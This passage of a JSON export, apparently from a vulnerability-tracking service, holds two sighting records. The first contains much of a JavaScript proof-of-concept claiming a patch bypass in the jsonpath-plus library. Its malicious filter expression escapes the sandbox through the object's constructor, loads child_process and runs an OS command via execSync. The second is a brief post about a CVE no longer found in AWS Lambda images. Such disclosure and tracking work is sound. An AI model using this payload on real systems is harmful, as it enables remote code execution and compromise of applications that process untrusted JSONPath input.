Object.hasOwn(data.users[0], 'constructor'));  // true \u2192 block skipped\n\nconsole.log('\\n[*] bind identity check:');\nconsole.log('    Function.bind({}) === Function =',\n  Function.bind({}) === Function);  // false \u2192 evalCallExpression guard is dead code\n\n// Step 2 \u2014 Filter expression accesses own constructor \u2192 escapes sandbox\nconst maliciousPath =\n  \"$.users[?(@.constructor('return process')().mainModule\" +\n  \".require('child_process').execSync('id').toString())]\";\n\nconsole.log('\\n[*] Running JSONPath with malicious filter expression...');\nconst result = JSONPath({ path: maliciousPath, json: data });\n\n// Step 3 \u2014 Confirm execution via side effect\nexecSync('id &gt; /tmp/jsonpath-bypass-proof.txt');\nconst proof = fs.readFileSync('/tmp/jsonpath-bypass-proof.txt', 'utf8').trim();\n\nconsole.log('\\n[+] Matched items:', result.map(r =&gt; r.name));\nconsole.log('[+] OS command output:', 
proof);\nconsole.log('\\n[!] RCE confirmed on jsonpath-plus@10.4.0 (latest)');\nconsole.log('[!] CVE-2024-21534 patch bypass \u2014 BLOCKED_PROTO_PROPERTIES ineffective');\nconsole.log('    against own constructor property in deserialized objects');\n", "creation_timestamp": "2026-05-06T14:08:05.000000Z"}, {"uuid": "5c2c7034-73b0-43e0-a753-a40fa864728f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mlb672j4q72y", "content": "\ud83d\udd0d Lambda Watchdog detected that CVE-2024-21538 is no longer present in latest AWS Lambda base image scans. https://github.com/aws/aws-lambda-base-images/issues/214 #AWS #Lambda #Security #CVE #DevOps #SecOps", "creation_timestamp": "2026-05-07T12:01:24.339302Z"}]}